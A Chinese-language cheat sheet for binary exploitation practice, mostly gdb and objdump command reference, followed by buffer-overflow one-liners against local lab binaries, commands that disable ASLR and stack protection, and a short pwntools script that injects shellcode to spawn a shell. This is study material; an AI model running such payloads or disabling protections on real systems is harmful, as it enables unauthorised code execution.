pwn的一些命令

gdb 常用命令

=======

r 执行程序至断点

c 继续执行程序

s 单步执行

n 步过执行

x 查看指定地址的内存地址的值  x/(n,f,u为可选参数) n为需要显示的内存单元个数

  f为显示格式:

               x(hex)按十六进制格式显示变量。

               d(decimal)按十进制格式显示变量。

               u(unsigneddecimal) 按十进制格式显示无符号整型。

               o(octal)按八进制格式显示变量。

               t(binary)按二进制格式显示变量。

               a(address)按十六进制格式显示变量。

               c(char)按字符格式显示变量。

               f(float)按浮点数格式显示变量

                u为每个单元的大小按字节数来算

下断点:b *address   or b function_name

  格式:b *内存地址(函数名)

delete:删除所有断点

       delete num:删除编号为num的断点 

       info break:列出所有断点

查看值

格式: p变量名

如果要查看变量的地址,用p &变量名 

Info 查看值

info proc map 查看进程的内存映射

find /bin/sh 查看结果中包含bin/sh的值

 

修改寄存器的值:set var $寄存器 = expr

给存储在address地址的变量类型为type的变量赋值: set {type}address=expr

i 显示信息更多信息 用help函数查看

反汇编命令disas/disass/disassemble

 格式: disas/disass/disassemble 函数名/起始地址[,结束地址]

 例如:

      disas main,显示main函数对应的汇编代码 


objdump命令

--archive-headers

-a

显示档案库的成员信息,类似ls -llib*.a的信息列出。

 

-b bfdname

--target=bfdname

指定目标码格式。这不是必须的,objdump能自动识别许多格式,比如:

 

objdump -b oasys -m vax -h fu.o

显示fu.o的头部摘要信息,明确指出该文件是Vax系统下用Oasys编译器生成的目标文件。objdump -i将给出这里可以指定的目标码格式列表。

 

-C

--demangle

将底层的符号名解码成用户级名字,除了去掉所开头的下划线之外,还使得C++函数名以可理解的方式显示出来。

 

--debugging

-g

显示调试信息。企图解析保存在文件中的调试信息并以C语言的语法显示出来。仅仅支持某些类型的调试信息。有些其他的格式被readelf -w支持。

 

-e

--debugging-tags

类似-g选项,但是生成的信息是和ctags工具相兼容的格式。

 

--disassemble

-d

objfile中反汇编那些特定指令机器码的section

 

-D

--disassemble-all

-d 类似,但反汇编所有section.

 

--prefix-addresses

反汇编的时候,显示每一行的完整地址。这是一种比较老的反汇编格式。

 

-EB

-EL

--endian={big|little}

指定目标文件的小端。这个项将影响反汇编出来的指令。在反汇编的文件没描述小端信息的时候用。例如S-records.

 

-f

--file-headers

显示objfile中每个文件的整体头部摘要信息。

 

-h

--section-headers

--headers

显示目标文件各个section的头部摘要信息。

 

-H

--help

简短的帮助信息。

 

-i

--info

显示对于 -b 或者 -m 选项可用的架构和目标格式列表。

 

-j name

--section=name

仅仅显示指定名称为namesection的信息

 

-l

--line-numbers

用文件名和行号标注相应的目标代码,仅仅和-d-D或者-r一起使用使用-ld和使用-d的区别不是很大,在源码级调试的时候有用,要求编译时使用了-g之类的调试编译选项。

 

-m machine

--architecture=machine

指定反汇编目标文件时使用的架构,当待反汇编文件本身没描述架构信息的时候(比如S-records),这个选项很有用。可以用-i选项列出这里能够指定的架构.

 

--reloc

-r

显示文件的重定位入口。如果和-d或者-D一起使用,重定位部分以反汇编后的格式显示出来。

 

--dynamic-reloc

-R

显示文件的动态重定位入口,仅仅对于动态目标文件意义,比如某些共享库。

 

-s

--full-contents

显示指定section的完整内容。默认所有的非空section都会被显示。

 

-S

--source

尽可能反汇编出源代码,尤其当编译的时候指定了-g这种调试参数时,效果比较明显。隐含了-d参数。

 

--show-raw-insn

反汇编的时候,显示每条汇编指令对应的机器码,如不指定--prefix-addresses,这将是缺省选项。

 

--no-show-raw-insn

反汇编时,不显示汇编指令的机器码,如不指定--prefix-addresses,这将是缺省选项。

 

--start-address=address

从指定地址开始显示数据,该选项影响-d-r-s选项的输出。

 

--stop-address=address

显示数据直到指定地址为止,该项影响-d-r-s选项的输出。

 

-t

--syms

显示文件的符号表入口。类似于nm -s提供的信息

 

-T

--dynamic-syms

显示文件的动态符号表入口,仅仅对动态目标文件意义,比如某些共享库。它显示的信息类似于 nm -D|--dynamic 显示的信息。

 

-V

--version

版本信息

 

--all-headers

-x

显示所可用的头信息,包括符号表、重定位入口。-x 等价于-a -f -h -r -t 同时指定。

 

-z

--disassemble-zeroes

一般反汇编输出将省略大块的零,该选项使得这些零块也被反汇编。

 

@file 可以将选项集中到一个文件中,然后使用这个@file选项载入。


将C函数编译为二进制程序:

$ gcc stack0.c-o stack0-fno-stack-protector -m32

gcc -g hello.c -o hello

g++-g hello.cpp -o hello

使用python打印并输入本地程序

$ python -c "print 'A'*65" | ./stack0

$ python -c "print'A'*64+'\x64\x63\x62\x61'" | xargs ./stack1

这里的 xargs 表示输入数据作为参数。

$ ./overflow1-3948d17028101c40$(python -c 'print"A"*64 + "B"')

 

当程序调用环境变量时,可修改环境变量

$ export GREENIE=`python -c 'print "A"*64 + "\x0a\x0d\x0a\x0d"'`

 

开启core dump的记录功能。

ulimit -cunlimited

sudo sh -c 'echo"/tmp/core.%t" > /proc/sys/kernel/core_pattern'

制造溢出
$ python -c "print 'A'*200" | ./stack5
$ gdb stack5 /tmp/core.1522317467
gdb-peda$ x/10s $esp-0x50

 $ strace ./overflow3-28d8a442fb232c0c$(python -c 'print"A"*76 +"BBBB"')

 关闭Linux系统的ASLR保护。

sudo sh -c"echo 0 > /proc/sys/kernel/randomize_va_space"

判断当前是否开启ASLR保护。

$ setarch `uname -m` -R ./overflow4-4834efeff17abdfb /$(python -c 'print "A"*76 + "BBBB"')

 from pwn import *
io = process('./stack5')
sc = asm(shellcraft.i386.sh())
payload = sc
payload += ((0x48+4)-len(sc)) * 'a'
payload += '\x20\xcf\xff\xff'
io.sendline(payload)
io.interactive()

ROPgadget --binary ./stack4

 



你可能感兴趣的:(pwn的一些命令)